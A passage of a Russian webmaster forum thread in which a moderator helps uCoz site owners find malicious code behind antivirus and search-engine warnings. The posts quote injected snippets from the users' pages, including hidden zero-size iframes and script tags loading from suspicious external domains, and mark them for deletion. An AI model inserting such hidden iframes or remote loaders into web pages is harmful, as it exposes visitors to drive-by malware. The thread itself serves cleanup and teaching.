Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Вирусы на сайтах (для изучения)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 91 | 21:35:35
Kaselita,
Quote
<div class="user-bar"><!--<s5212>-->Приветствую Вас<!--</s>--> <b>Гость</b> | <a href="http://kaselita.ucoz.ru/news/rss/">RSS</a><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7490"></script></div>
<h1><!-- <logo> -->Сайт учителя технологии Михайловой Светланы<!-- </logo> --></h1>

выделенное красным удалить


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Никита_компании_Хрышик:)
Сообщений: 1
Репутация: -4

Сообщение # 92 | 08:00:12
Помогите! Google выдаёт что сайт заражён, онлайн проверка говорит:

Сайт:

Заранее спасибо.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 93 | 15:32:16
Никита_компании_Хрышик:), вроде чисто. вы уже чистили сайт? прямых выходов на то за что ваш сайт заблокирован у вас нет.

но у вас есть шикарная помойка на форуме. в виде

Code
<script type="text/javascript">  
  $(document).ready(function() {  

  $('td.gTableSubTop').find("a:contains('Просмотры')").html('Популярность');  
  $('td.threadViewTd').each(function(){  
  if($(this).html() > 0 && $(this).html() < 9 || $(this).html() == 0 && $(this).html() < 9){$(this).html('<img title="Очень низкая популярность" src="http://fuckubrain.net.ru/rate/0stars.gif" border="0" alt="img" />');}  
  if($(this).html() > 8 && $(this).html() < 60){$(this).html('<img title="Низкая популярность" src="http://fuckubrain.net.ru/rate/1stars.gif" border="0" alt="img" />');}  
  if($(this).html() > 59 && $(this).html() < 190){$(this).html('<img title="Средняя популярность" src="http://fuckubrain.net.ru/rate/2stars.gif" border="0" alt="img" />');}  
  if($(this).html() > 189 && $(this).html() < 290){$(this).html('<img title="Высокая популярность" src="http://fuckubrain.net.ru/rate/3stars.gif" border="0" alt="img" />');}  
  if($(this).html() > 289 && $(this).html() < 450){$(this).html('<img title="Очень высокая популярность" src="http://fuckubrain.net.ru/rate/4stars.gif" border="0" alt="img" />');}  
  if($(this).html() > 449){$(this).html('<img title="Очень популярная тема" src="http://fuckubrain.net.ru/rate/5stars.gif" border="0" alt="img" />');}  
  });  
  });  

  </script>

сайт откуда эта радость подгружается наглухо заблокирован гуглом. там скорее всего вечный фильтр уже стоит. сам сайт закрыт на тех.работы. картинки естественно не рабочие.
а куча ссылок с сайта с черной меткой имеется.

плюс эта радость с чужого сайта подгружается

Code
<script type="text/javascript" src="http://fbi-clan.ru/hideforums.js"></script>

я не знаю сколько раз ещё сказать, чтобы было всем понятно. что нельзя ставить на сайт скрипты залитые на чужой! что не стоит на сайт ставить никакой код с графикой и элементами расположенными на других сайтах!


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Shoop1
Сообщений: 42
Репутация: -6

Сообщение # 94 | 16:16:39
у меня что то стало перекидывать с моего сайта на другой и в статистики кто онлайн написано
http://cs-zona.ru/ikonki/errrrr.png
если это пользователь я даж забанить не могу нажима на ник и открываеться мой профиль
Ситис
Сообщений: 4
Репутация: 0

Сообщение # 95 | 18:40:31
У меня антивирусник вновь бурно реагирует на сайт...не знаю в чём причина...если кто поможет, заранее благодарен...
Jboss
Сообщений: 14
Репутация: 7

Сообщение # 96 | 22:18:48
Здравствуйте Уважаемые!!
Постараюсь кратко объяснить.Зашел в панель управления сайтом.Прочитал "Раскрутка вашего сайта.
Полезная информация и советы по раскрутке вашего сайта в сети Интернет." зашел ,читаю :Обмен ссылками и кнопками с другими сайтами. Такой обмен создает внешние ссылки на Ваш сайт, которые повышают позиции Вашего сайта в поисковых системах. Партнеров по обмену ссылками вы можете искать везде, где только возможно, например, в нашем рейтинге сайтов или любом другом каталоге, например, каталоге Yandex.ru."Регистрируюсь в каталоге "Yandex.ru."Заполняю заявку на бесплатную раскрутку сайта.Пришел ответ что моя заявка будет рассмотрена в течении 3 месяцев.
Два дня назад захожу на свой сайт и вижу :
"Предупреждение о вредоносном ПО

Страница, которую вы хотите посетить, была замечена в распространении вредоносного программного обеспечения. Любая программа на этой странице может представлять опасность.

Opera Software настоятельно не рекомендует посещать эту страницу.
Вернуться
Почему эта страница блокирована?

Информация о потенциальной опасности сайта предоставлена Яндексом."

Вот так Яндекс раскручивает мой сайт.

Помогите,подскажите что мне теперь Делать??? У меня на сайте очень мало программ и то все эти программы есть на любом сайте и эти сайты не блокируются из-за них ,почему это действует только на мой сайт???

Прошу вас помогите пожалуйста Jakob Harms(Jboss) сайт : http://newvidiklub.my1.ru/

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 97 | 22:57:19
Jboss, в первую очередь прочитайте это //forum.ucoz.ru/forum/31-34589-1 первое сообщение темы.
баннерообменом нужно заниматься с толком, а не сыпать все сразу к себе на страницы.
вы должны понимать, что чем меньше внешних ссылок на вашей странице - тем лучше.
коды каталогов удалите!
из вида новостей на главной удалите сотню раз повторяющийся код на покупку премиума от рапидшары такое огромное количество внешних ссылок с рефом яндекс блокирует неглядя

вот это

Code
<a href="http://rapidget.pp.ua/links/index.php" title=" Здесь Вы можете выпрямить ссылки на depositfiles.com !!" target="_blank"><STRONG><FONT color="#ff0000"><B>Выпремлялка ссылок!!</B></FONT></STRONG><br><br></a>
на главную точно не стоило вешать, тем более так высоко, выше контента

вот это убрать ОБЯЗАТЕЛЬНО!!!

Code
<a href="http://popunder.ru/?r=26593">Биржа трафика N 1 в РУнете</a><br><br>

в общем ваш сайт яндекс признал помойкой.

уберите с главной все внешние ссылки, все каталоги. оставьте по предельному минимуму, только жизненно-необходимое

ещё раз повторяю. чем меньше внешних ссылок - тем лучше!


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Jboss
Сообщений: 14
Репутация: 7

Сообщение # 98 | 23:15:52
Quote (webanet)
в общем ваш сайт яндекс признал помойкой.

уберите с главной все внешние ссылки, все каталоги. оставьте по предельному минимуму, только жизненно-необходимое

ещё раз повторяю. чем меньше внешних ссылок - тем лучше!

Спасибо,а какие Вы имеете ввиду внешние ссылки??Все что Вы написали я убрал
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 99 | 00:03:09
Jboss, нет. не убрано
Code
<a href="http://rapidshare.com/premium.html?ref=REFSTRING"><img src="http://newvidiklub.my1.ru/knopki/rap.gif" border="0" align="absmiddle" /></a>

а про помойку это она - ваша помойка

Quote
<a href="http://www.letitbit.net/page/partners.php?aff=Jboss"><img src="http://images.letitbit.net/images/promo/2/100.gif" border="0" /></a><br><br>

<!-- DepositFiles 160 x 201 Banner DO NOT MODIFY THIS CODE -->
<a href="http://depositfiles.com/signup.php?ref=Jboss">
<img src="http://img2.depositfiles.net/adroot/df/referral/160x201.gif" border="0"></a>
<center>
<br><a href="http://forum.newvidiklub.ru/" target="_blank"><script language="JavaScript">document.write("<img src='http://www.royalcount.de/counter.php?uid=23044580f0c3231a37954afd8a130301&t=white&r=" + encodeURI(document.location.href) "'* * * "); </script></a>

</td></tr><tr><td><img src="https://src.ucoz.ru/t/831/16.gif" border="0"></td></tr></tbody></table><br><!--/-->
<!-- --><table border="0" cellpadding="0" cellspacing="0" width="190"><tbody><tr><td style="background: rgb(216, 220, 225) url(https://src.ucoz.ru/t/831/14.gif) repeat scroll 0%; color: rgb(79, 93, 113); padding-left: 15px;" height="31"><b><span style="color: rgb(255, 0, 0);">Каталоги </span></b></td></tr><tr><td style="padding: 3px 5px 0px; background: transparent url(https://src.ucoz.ru/t/831/15.gif) repeat scroll 0%;">

<center><a href="http://all-softs.ru/dir/newvidiklub/1-1-0-69"><img src="http://all-softs.ru/Banner/4.gif" title="Бесплатный ТОП раскрутки сайтов" alt="Бесплатный ТОП раскрутки сайтов" align="" border="0" height="31" width="88"></a>
<br><br>
<center><a href="http://www.Rus-Links.de" target="_blank" title="Rus-Links.de - Webkatalog für Russische Webseiten"><img src="http://www.rus-links.de/style_button.jpg" border="0" width="88" height="31"></a>
<ul class="uz">

<center>
<br>
<a href="http://www.combayn.ru/cncat/from.php?38999">Combayn CATaLog</a>
<br>

<br>
<a href="http://www.pozdravim.ru/" title="доставка цветов" target="_blank">доставка цветов заказ по Москве</a>
<br>
<a href="http://www.starogo.net">Каталог ссылок. Информационный портал - Старого.NET</a>
<br>
<a href="http://perviy.net/" target="_blank">Интернет-каталог сайтов</a>
<br>

<!-- counter_av 19659634e6ce29196596b67d7607 -->

<img src="http://altervista.ru/counter_av.gif?id=196596" width="1" height="1" border="0" alt="">
<a href="http://www.altavista.ru/shop/customer/home.php?cat=993">фотоаппараты Samsung</a>
<!-- counter_av 19659634e6ce29196596b67d7607 -->

<br><br>
<a href='http://boge.com.ru'><img border='0' src='http://boge.com.ru/images/boge88x31.gif' alt='Амортизаторы BOGE (Германия) для ВАЗ, TOYOTA, BMW, AUDI, HONDA, Мерседес, OPEL, FORD, MITSUBISHI и других автомобилей.' width='88' height='31'></a>
<br><br>
<a href="http://refo.ru" target="_blank"><img src="http://refo.ru/button.gif" border="0" width="88" height="31" alt="Refo.ru - русские сайты"></a>

<br><br>
<!-- Top100 -->
<a href="http://www.hi-man.ru/in.php?id=252197" target="_blank"><img border="0" src="http://www.hi-man.ru/site/hi-man.gif" alt="Каталог ссылок, Top 100." width="88" height="31"></a>
<!-- Top100 -->

<br><br>

<center><a href="http://submitter.ru/"><img alt="Раскрутка сайта, Оптимизация сайта, Продвижение сайта, Реклама!" src="http://submitter.ru/i.php" height=31 width=88 border=0></a>

вы своей "раскруткой" вогнали сайт под фильтр яндексу. да и счечиков такое огромное количество при нулевой посещаемости ни к чему


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Marter
Сообщений: 11
Репутация: 0

Сообщение # 100 | 21:23:05
Доброго времени суток! не могу отыскать ифрейм, помогите пожалуйста, открывает всплывающее окно по любой ссылке ( сайт http://xristiane.ucoz.ru
Сообщение отредактировал Marter - Среда, 24 Ноя 2010, 21:23:51
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 101 | 21:27:13
Marter,
Quote
<iframe src="http://www.banneroobmen.avk.lt/88x31/work.php?ID=Marter" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="no" width="88" frameborder="0" height="31"></iframe><a href="http://www.banneroobmen.avk.lt/">
вот это стоит ифреймом в вашей мусорке под названием сайт в каталогах.
эта мусорка вообще не нужна на главной, как и эти каталоги и особенно баннерообмен

Quote
<br><center><b>Выбирите язык</b><br>
это конечно очень хорошо для раскрутки) по орфографическим ошибкам. лучше уберите эту кнопку с выбором языков. там тьма внешних ссылок, да ещё подгрузка инородного скрипта

вот это убрать

Code
<!-- НАЧАЛО ССЫЛКИ НА REFER.RU -->
<a href="http://www.refer.ru/" target="_blank">
<img ilo-full-src="http://www.refer.ru/images/ref_buttons/green_light_a.gif" src="http://www.refer.ru/images/ref_buttons/green_light_a.gif" alt="Каталог сайтов - Refer.Ru" width="88" border="0" height="31"></a>
<!-- КОНЕЦ ССЫЛКИ НА REFER.RU -->

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Argentum0163
Сообщений: 1
Репутация: 0

Сообщение # 102 | 00:43:54
Здравствуйте! Помогите решить проблему!!!!Не могу найти вредоносный код.Недавно создал сайт для узкого круга пользователей,все было нормально,но вдруг антивирус стал на него реагировать.Яндекс не определил ничего,а Касперский каждый раз определяет загрузку разных вредоносных ссылок.Вот сайт http://suppertusovka.clan.su. Заранее благодарен!!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 103 | 01:10:31
Argentum0163,
Quote
<TABLE border="0" height="15" cellspacing="0" cellpadding="0"><TBODY><TR><TD background="http://idion.ru/img/Menu_Button_left.gif" width="2"></TD><TD background="http://idion.ru/img/Menu_Button_center.gif"> <A "="" style="text-decoration: none" target="_blank"><FONT size="1"><IMG src="http://idion.ru/img/Programms.gif" border="0" align="absmiddle"><iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe></FONT> </A><SPAN style="font-size: 8pt"><A "="" style="text-decoration: none" target="_blank"><SPAN style="color: #000000; font-size: 8pt"><B>Вопрос: </B>Оцените мой сайт</SPAN></A></SPAN> </TD><TD background="http://idion.ru/img/Menu_Button_right.gif" width="3"></TD></TR></TBODY></TABLE><center><img src="http://celsoft.at.ua/09c9905d9eb1.gif" border="0" alt="" /></center>

лучше удалить всё. что выделено в цитате

находится в блоке наш опрос. а вообще почитайте тему, желательно всю. и сделайте выводы о сторонних скриптах и картинках со сторонних ресурсов и прочих чужеродных ссылках


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
ser-kut
Сообщений: 2
Репутация: 0

Сообщение # 104 | 22:52:44
webanet, добрый вечер! Помоги пожалуйста найти вирус на сайте...
Когда захожу с мазилы все нормально. Захожу через google или opera, выскакивает окно с просьбой загрузить файл на копм... А антивирус определяет вирус... Не могу найти его..
Заранее спасибо!!
Ссылка на сайт http://kirovfut.ucoz.ru/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 105 | 22:58:47
ser-kut,
Quote
<div class="answer"><input id="a8075" type="radio" name="answer" value="5" style="vertical-align:middle;" /> <label style="vertical-align:middle;display:inline;" for="a8075">Нет</label></div>
<div class="answer"><input id="a8076" type="radio" name="answer" value="6" style="vertical-align:middle;" /> <label style="vertical-align:middle;display:inline;" for="a8076">Мне не интересен этот турнир</label></div>
<div align="center" id="pollSbm807" class="pollButton"><input class="pollBut" id="PlBtn807" type="submit" value="Ответить" /></div>
<input type="hidden" name="id" value="7" />

<input type="hidden" name="a" value="1" /><input type="hidden" name="ajax" value="807" /></div>
<div style="padding-top:4px;text-align:center;"><iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://kirovfut.ucoz.ru/poll/7'});return false;" src="http://i065.radikal.ru/1007/1a/bcf8b653350d.png"> <img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,{closeonesc:1,maxh:400,max:1,min:1},{url:'http://kirovfut.ucoz.ru/poll/0-2'});return false;" src="http://s41.radikal.ru/i094/1007/8c/088815426aa2.png"></div>
<script type="text/javascript">
var a = ['http://i026.radikal.ru/0909/c3/31055bd00c8e.gif','http://s44.radikal.ru/i103/0909/8e/d9bbc1c577eb.gif','http://i035.radikal.ru/0909/1e/c846eb96239c.gif','http://s04.radikal.ru/i177/0909/10/b89c877b4b90.gif','http://i033.radikal.ru/0909/61/8319ceb1a628.gif'];
for(var i = 0; i < a.length; i++){
$('div.answer div div').eq(i).css({background: 'url(' + a[i] + ')', backgroundRepeat: 'repeat-x'});
}

$('div.answer span').each(function(){$(this).html($(this).html()+' - <span class="procent">'+$(this).attr('title').split(':')[1]+'</span>')});
</script>

выделенное красным удалить. находится в блоке наш опрос


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Поиск: